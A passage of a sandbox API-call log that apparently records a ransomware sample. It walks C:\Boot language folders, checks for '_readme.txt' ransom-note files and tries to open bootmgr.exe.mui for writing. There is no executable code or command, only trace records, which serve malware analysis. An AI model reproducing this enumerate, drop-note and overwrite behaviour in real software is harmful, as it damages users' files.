(in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.064] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.064] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.065] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.065] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.065] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.065] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.065] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.065] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.065] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.065] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.065] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.065] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0130.065] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.065] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.065] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.065] PathFindFileNameW (pszPath="") returned="" [0130.065] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.066] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.066] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.066] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.066] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0130.066] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.066] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.066] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0130.066] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0130.067] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.067] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.067] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0130.067] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3904b80, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.067] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.067] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0130.067] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0130.068] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3904b80, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.068] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned=".txt" [0130.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0130.068] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3904b80, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3904b80, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.068] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0130.068] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.068] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.068] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.068] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0130.068] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.068] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0130.069] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0130.069] PathFindFileNameW (pszPath="") returned="" [0130.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0130.069] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0130.069] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0130.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0130.069] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0130.069] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0130.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0130.070] FreeLibrary (hLibModule=0x759d0000) returned 1 [0130.070] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0130.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.070] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0130.070] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0130.070] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0130.070] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0130.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.070] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.071] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned=".mui" [0130.071] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0130.071] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe392ace0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0130.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0130.071] PathFindExtensionW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned=".txt" [0130.071] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe392ace0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe392ace0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe392ace0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0130.071] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.071] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0130.071] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.071] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.071] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.072] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.072] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.073] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.073] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.074] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.074] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.075] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.075] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.075] HeapFree (in: hHeap=0x4970000, 